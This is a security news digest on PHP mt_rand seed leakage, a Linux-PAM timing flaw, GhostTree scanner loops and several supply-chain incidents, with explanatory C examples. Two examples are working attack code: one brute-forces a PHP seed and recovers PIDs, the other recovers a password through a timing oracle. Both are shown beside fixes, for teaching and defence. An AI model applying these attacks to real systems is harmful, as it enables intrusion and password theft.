PHP 7 mt_rand leaks PID, Linux PAM bleeds plaintext passwords
By dissecting PHP 7.0's seed generation for mt_rand, researchers show that the seed is built from the process ID together with the call time and the state of PHP's combined LCG. The seed is only 32 bits wide, so a single mt_rand output is enough to brute-force it; if the attacker can also guess the call time, the process ID can be solved for, exposing a new side channel in many PHP apps.
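The two attacker steps in that story, as an added example that is not code from the article or from PHP: it re-implements the PHP 7.0 mt_srand()/mt_rand() path (php_mt_initialize, the pre-7.1 twist() macro and the tempering) and the 7.0 GENERATE_SEED() formula `(time(0) * getpid()) ^ (zend_long)(1000000.0 * php_combined_lcg())`, then brute-forces the seed from one output and solves for PIDs consistent with a guessed time. The time, PID and LCG term in the scenario are constructed; the seed search is shown over a window rather than the whole 32-bit space.

```c
/* Added example, not code from the article or from PHP. Re-implements the
 * PHP 7.0 mt_srand()/mt_rand() path (php_mt_initialize, the pre-7.1 twist
 * and the tempering) plus the 7.0 GENERATE_SEED() formula, then shows the two
 * attacker steps: brute-force the 32-bit seed from one mt_rand() output, and
 * solve for the PID once the call time is guessed. Scenario values (time, PID,
 * LCG term) are constructed. */
#include <stdint.h>
#include <stdio.h>

#define MT_M 397
#define LCG_TERM_MAX 1000000U  /* (zend_long)(1000000.0 * php_combined_lcg()), lcg in (0,1) */

/* PHP's twist() macro. Before 7.1 PHP used loBit(u); real MT19937 uses loBit(v). */
static uint32_t twist(uint32_t m, uint32_t u, uint32_t v, int legacy)
{
    uint32_t mixed = (u & 0x80000000U) | (v & 0x7FFFFFFFU);
    uint32_t lo = legacy ? (u & 1U) : (v & 1U);
    return m ^ (mixed >> 1) ^ ((uint32_t)(-(int32_t)lo) & 0x9908B0DFU);
}

/* First mt_rand() value for a seed (PHP returns php_mt_rand() >> 1, 31 bits).
 * After php_mt_reload() state[0] depends only on state[0], [1] and [M], so
 * only the first M+1 words of php_mt_initialize() are needed. */
uint32_t php_mt_first_output(uint32_t seed, int legacy)
{
    uint32_t st[MT_M + 1];
    st[0] = seed;
    for (int i = 1; i <= MT_M; i++)
        st[i] = 1812433253U * (st[i - 1] ^ (st[i - 1] >> 30)) + (uint32_t)i;
    uint32_t s1 = twist(st[MT_M], st[0], st[1], legacy);
    s1 ^= s1 >> 11;                      /* tempering, as in php_mt_rand() */
    s1 ^= (s1 << 7) & 0x9D2C5680U;
    s1 ^= (s1 << 15) & 0xEFC60000U;
    s1 ^= s1 >> 18;
    return s1 >> 1;
}

/* GENERATE_SEED() as PHP 7.0 computes it: (time * pid) ^ lcg_term, truncated
 * to the uint32_t that php_mt_srand() takes. */
uint32_t php70_seed(int64_t t, int64_t pid, uint32_t lcg_term)
{
    return (uint32_t)((uint64_t)(t * pid) ^ (uint64_t)lcg_term);
}

/* Step 1: find the seed in [lo, hi) whose first output matches; -1 if none.
 * The full 2^32 sweep is feasible in optimised C; this loop is the plain form. */
int64_t recover_seed(uint32_t output, uint64_t lo, uint64_t hi, int legacy)
{
    for (uint64_t s = lo; s < hi && s <= 0xFFFFFFFFULL; s++)
        if (php_mt_first_output((uint32_t)s, legacy) == output)
            return (int64_t)s;
    return -1;
}

/* Step 2: with the seed known and the call time guessed, a PID is consistent
 * iff ((t * pid) mod 2^32) XOR seed lies in the range the LCG term can take. */
int pid_is_consistent(uint32_t seed, int64_t t, int64_t pid)
{
    uint32_t lcg_term = (uint32_t)((uint64_t)(t * pid)) ^ seed;
    return lcg_term < LCG_TERM_MAX;
}

/* Enumerates PIDs 1..pid_max consistent with (seed, t); stores up to max_out
 * of them in out and returns the total number found. */
int recover_pid_candidates(uint32_t seed, int64_t t, int64_t pid_max,
                           int64_t *out, int max_out)
{
    int n = 0;
    for (int64_t pid = 1; pid <= pid_max; pid++)
        if (pid_is_consistent(seed, t, pid)) {
            if (n < max_out) out[n] = pid;
            n++;
        }
    return n;
}

int main(void)
{
    /* Constructed scenario: mt_rand() first called at t in PID 4242 with LCG term 123456. */
    int64_t t = 1700000000, pid = 4242;
    uint32_t seed = php70_seed(t, pid, 123456);
    uint32_t leaked = php_mt_first_output(seed, 1);   /* what the attacker observes */

    /* Attacker: seed search (window shown here; a real run sweeps [0, 2^32)). */
    int64_t found = recover_seed(leaked, seed - 4096ULL, seed + 4096ULL, 1);
    int64_t cands[64];
    int n = recover_pid_candidates((uint32_t)found, t, 32768, cands, 64);
    printf("observed %u -> seed %lld -> %d candidate PID(s), first %lld\n",
           leaked, (long long)found, n, (long long)(n ? cands[0] : -1));
    return 0;
}
```

Two caveats a practitioner will hit. The legacy flag matters: PHP 7.0's twist() reads the low bit of the wrong word, so outputs differ from standard MT19937 (the `legacy=0` path reproduces the PHP 7.1+ MT_RAND_MT19937 mode, where mt_srand(1) gives 895547922). And step 2 yields a short list rather than one PID: a wrong PID survives with probability about 10^6/2^32, roughly eight false candidates at a pid_max of 32768, so settling on a single PID needs extra constraints on the LCG term, which PHP also seeds from the time and PID.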
CVE-2026-54411 affects Linux-PAM 1.7.2: the pam_userdb module leaks a password's length and its matching prefix through a timing discrepancy in its plaintext comparison. An attacker who can trigger authentication repeatedly can recover the full password byte by byte when pam_userdb is configured with crypt=none or an unrecognized crypt method.
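The bug class behind that advisory, as an added example that is not Linux-PAM's code: a hypothetical plaintext check with an early-exit byte loop, instrumented to report how many byte comparisons it performed (standing in for wall-clock timing), an attacker loop that recovers the stored password through that oracle alone, and a fixed-iteration comparison that gives the oracle nothing to work with. The stored passwords are constructed.

```c
/* Added example, not Linux-PAM's code. Models the bug class the advisory
 * describes: a plaintext password check whose running time depends on the
 * guess. The comparison is instrumented to report how many byte steps it took,
 * standing in for wall-clock timing, so the attack runs deterministically. */
#include <stddef.h>
#include <stdio.h>
#include <string.h>

typedef int (*check_fn)(const char *stored, const char *guess, size_t *steps);

/* Hypothetical vulnerable check. Two leaks: the length test fails in zero
 * byte steps, and the byte loop exits at the first mismatch, so
 * steps == (matching prefix length + 1). Returns 1 on a full match. */
int leaky_password_ok(const char *stored, const char *guess, size_t *steps)
{
    *steps = 0;
    if (strlen(stored) != strlen(guess))
        return 0;
    for (size_t i = 0;; i++) {
        *steps = i + 1;
        if (stored[i] != guess[i]) return 0;
        if (stored[i] == '\0')     return 1;
    }
}

/* Hardened check: always walks the whole stored secret and accumulates the
 * difference, so steps == strlen(stored) for every guess. Returns 1 on match. */
int ct_password_ok(const char *stored, const char *guess, size_t *steps)
{
    size_t slen = strlen(stored), glen = strlen(guess);
    unsigned char diff = (unsigned char)(slen != glen);
    for (size_t i = 0; i < slen; i++)
        diff |= (unsigned char)(stored[i] ^ (i < glen ? guess[i] : 0));
    *steps = slen;
    return diff == 0;
}

/* Attacker side: sees the secret only through the oracle's step count.
 * Phase 1 finds the length, phase 2 one byte per position. Returns 1 with the
 * secret in out on success, 0 when the oracle gives no unique signal (as it
 * does against ct_password_ok). */
int recover_via_oracle(const char *secret, check_fn check, char *out, size_t out_size)
{
    char guess[128];
    size_t steps, len = 0;
    for (size_t L = 1; L + 1 < sizeof guess && L + 1 < out_size; L++) {
        memset(guess, 'a', L);
        guess[L] = '\0';
        check(secret, guess, &steps);
        if (steps > 0) { len = L; break; }       /* length accepted: bytes now compared */
    }
    if (len == 0) return 0;
    for (size_t pos = 0; pos < len; pos++) {
        int hit = -1, hits = 0;
        for (int c = 0x20; c < 0x7F; c++) {      /* guess[0..pos-1] already recovered */
            guess[pos] = (char)c;
            check(secret, guess, &steps);
            if (steps > pos + 1) { hit = c; hits++; } /* compare went one byte deeper */
        }
        if (hits != 1) return 0;
        guess[pos] = (char)hit;
    }
    memcpy(out, guess, len + 1);
    return check(secret, out, &steps);
}

/* Small wrappers that return plain values for the demo below. */
size_t leaky_steps(const char *stored, const char *guess) { size_t s; leaky_password_ok(stored, guess, &s); return s; }
size_t ct_steps(const char *stored, const char *guess)    { size_t s; ct_password_ok(stored, guess, &s); return s; }
int recovers(check_fn check, const char *secret)
{
    char out[64];
    return recover_via_oracle(secret, check, out, sizeof out) && strcmp(out, secret) == 0;
}

int main(void)
{
    const char *secret = "Tr0ub4dor&3";              /* constructed stored password */
    printf("leaky: wrong length %zu steps, prefix 'Tr0' %zu steps, recovered=%d\n",
           leaky_steps(secret, "x"), leaky_steps(secret, "Tr0xxxxxxxx"), recovers(leaky_password_ok, secret));
    printf("ct:    wrong length %zu steps, prefix 'Tr0' %zu steps, recovered=%d\n",
           ct_steps(secret, "x"), ct_steps(secret, "Tr0xxxxxxxx"), recovers(ct_password_ok, secret));
    return 0;
}
```

In a real deployment the step count becomes a few nanoseconds per byte, so the attacker needs many samples per candidate and a quiet network path, but the structure is the same; the early exit and the separate length check are what make the secret's bytes influence the timing. The fixed-iteration compare still costs time proportional to the stored secret's length, so it is not a substitute for storing only a salted hash.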
Researchers uncovered three CVE‑rated vulnerabilities in Jupyter Enterprise Gateway that let any notebook user escalate to full cluster admin, read secrets, mount host filesystems, and spawn privileged pods. The issue stems from a privileged service account the gateway uses to launch kernels. A patched release (v3.3.0) is now available.
A security researcher signed up as a FIFA player agent and was automatically added to FIFA’s Microsoft Entra tenant. By bypassing client‑side checks, he accessed the live Football Data Platform and the Streaming Management panel, exposing every World Cup match’s camera feeds and stream keys. The flaw shows how external registrations can grant unchecked internal access.
An attacker stole a Mastra maintainer account and republished 116 packages within 27 minutes, each carrying a hidden dependency on easy-day-js. The typosquatted module runs a post‑install dropper that disables TLS validation and fetches a second‑stage payload; the affected packages together see roughly 28 million downloads a month.
GhostTree creates self‑referencing junctions that generate endless valid paths, so Microsoft Defender and other EDR tools loop forever while scanning the folder. As a result, malware placed in the same directory stays undetected until the scan times out or is aborted. The technique needs only write access to the directory, not admin rights.
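The scanner-side check this calls for, as an added example that is neither GhostTree's code nor any EDR's: a POSIX analogue in which a symlink back to an ancestor plays the role of the self-referencing junction. A naive walker that follows it keeps finding new valid paths (a depth cap stands in for the scan timeout), while a walker that records each directory's (st_dev, st_ino) identity scans it once and still reaches the file planted beside the link. The tree is constructed under /tmp and removed afterwards.

```c
/* Added example; not GhostTree's code and not any scanner's. POSIX analogue of
 * the technique: a symlink pointing back at an ancestor plays the role of the
 * self-referencing junction. The naive walker follows it and keeps producing new
 * valid paths (a depth cap stands in for the scan timeout); the identity-aware
 * walker keys directories by (st_dev, st_ino), visits each once, and still finds
 * the file planted beside the link. The tree is constructed under /tmp. */
#define _XOPEN_SOURCE 700
#define _DEFAULT_SOURCE
#include <dirent.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

#define DEPTH_CAP 20
#define MAX_SEEN 1024
#define PATH_CAP 4096

typedef struct { dev_t dev[MAX_SEEN]; ino_t ino[MAX_SEEN]; int n; } seen_set;

/* Returns 1 if the directory identity is new (and records it), 0 if already seen. */
static int seen_add(seen_set *s, const struct stat *st)
{
    for (int i = 0; i < s->n; i++)
        if (s->dev[i] == st->st_dev && s->ino[i] == st->st_ino) return 0;
    if (s->n < MAX_SEEN) { s->dev[s->n] = st->st_dev; s->ino[s->n] = st->st_ino; s->n++; }
    return 1;
}

/* Counts regular files under path. seen == NULL gives the naive walker. */
static long scan_dir(const char *path, int depth, seen_set *seen, long *dirs_visited)
{
    struct stat st;
    if (depth > DEPTH_CAP) return 0;                 /* stands in for the scan timeout */
    if (stat(path, &st) != 0 || !S_ISDIR(st.st_mode)) return 0;  /* stat() follows links */
    if (seen && !seen_add(seen, &st)) return 0;      /* this directory was already scanned */
    (*dirs_visited)++;
    DIR *d = opendir(path);
    if (!d) return 0;
    long files = 0;
    struct dirent *e;
    while ((e = readdir(d)) != NULL) {
        if (!strcmp(e->d_name, ".") || !strcmp(e->d_name, "..")) continue;
        char child[PATH_CAP];
        struct stat cst;
        if (snprintf(child, sizeof child, "%s/%s", path, e->d_name) >= (int)sizeof child) continue;
        if (stat(child, &cst) != 0) continue;
        if (S_ISDIR(cst.st_mode)) files += scan_dir(child, depth + 1, seen, dirs_visited);
        else if (S_ISREG(cst.st_mode)) files++;
    }
    closedir(d);
    return files;
}

/* Builds <root>/hide/malware.txt and <root>/hide/loop -> <root>; 0 on success. */
static int build_lab(char *root, size_t root_size)
{
    char tmpl[] = "/tmp/ghosttree.XXXXXX", p[PATH_CAP];
    if (!mkdtemp(tmpl)) return -1;
    snprintf(root, root_size, "%s", tmpl);
    snprintf(p, sizeof p, "%s/hide", root);
    if (mkdir(p, 0700) != 0) return -1;
    snprintf(p, sizeof p, "%s/hide/malware.txt", root);
    FILE *f = fopen(p, "w");
    if (!f) return -1;
    fputs("constructed sample, not malware\n", f);
    fclose(f);
    snprintf(p, sizeof p, "%s/hide/loop", root);
    return symlink(root, p);
}

static void destroy_lab(const char *root)
{
    char p[PATH_CAP];
    snprintf(p, sizeof p, "%s/hide/loop", root);        unlink(p);
    snprintf(p, sizeof p, "%s/hide/malware.txt", root); unlink(p);
    snprintf(p, sizeof p, "%s/hide", root);             rmdir(p);
    rmdir(root);
}

/* Runs one walker over a fresh lab tree. Returns files found (-1 on setup
 * failure); dirs_visited receives the number of directory scans performed. */
long run_lab(int identity_aware, long *dirs_visited)
{
    char root[PATH_CAP];
    seen_set seen = { .n = 0 };
    *dirs_visited = 0;
    if (build_lab(root, sizeof root) != 0) return -1;
    long files = scan_dir(root, 0, identity_aware ? &seen : NULL, dirs_visited);
    destroy_lab(root);
    return files;
}
long lab_files(int identity_aware) { long d; return run_lab(identity_aware, &d); }
long lab_dirs(int identity_aware)  { long d; run_lab(identity_aware, &d); return d; }

int main(void)
{
    long d;
    long naive = run_lab(0, &d);
    printf("naive walker: %ld file hits over %ld directory scans (capped at depth %d)\n", naive, d, DEPTH_CAP);
    long aware = run_lab(1, &d);
    printf("aware walker: %ld file hit over %ld directory scans\n", aware, d);
    return 0;
}
```

With the cap at 20 the naive walker scans 21 directories and reports the same file ten times; without the cap it never returns, which is the behaviour the article attributes to the affected scanners. On Windows the equivalent identity is the volume serial number plus file index from GetFileInformationByHandle, and the simpler policy of not traversing reparse points at all (FILE_ATTRIBUTE_REPARSE_POINT) closes the loop before any path is built.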
Security researchers uncovered a VS Code Marketplace extension, jupyter-powerdev, that contains a multi-stage backdoor linked to DPRK intelligence. The malware uses Microsoft Graph and SharePoint for encrypted C2, and deploys Windows and Linux agents to exfiltrate code and execute commands. Its supply-chain placement puts any developer who installs it at instant risk.
Researchers at Deep Specter reported two design issues, commit‑timestamp backdating and unverified author metadata, that let Shai‑Hulud variants hide in 516 malicious packages and compromise over 200 developer accounts. GitHub labeled the reports ineligible, citing that the behaviors are inherent to Git and not bugs, leaving the supply‑chain threat unchecked.
Hunt.io discovered an unsecured Python SimpleHTTP server in the Netherlands hosting over 5 GB of exfiltrated files, including LA Metro's SCADA database backups and data on Israeli victims. The dump reveals detailed transit operations, personnel records and plaintext credentials, exposing critical infrastructure and pointing to an aggressive campaign by the threat actor Ababil of Minab.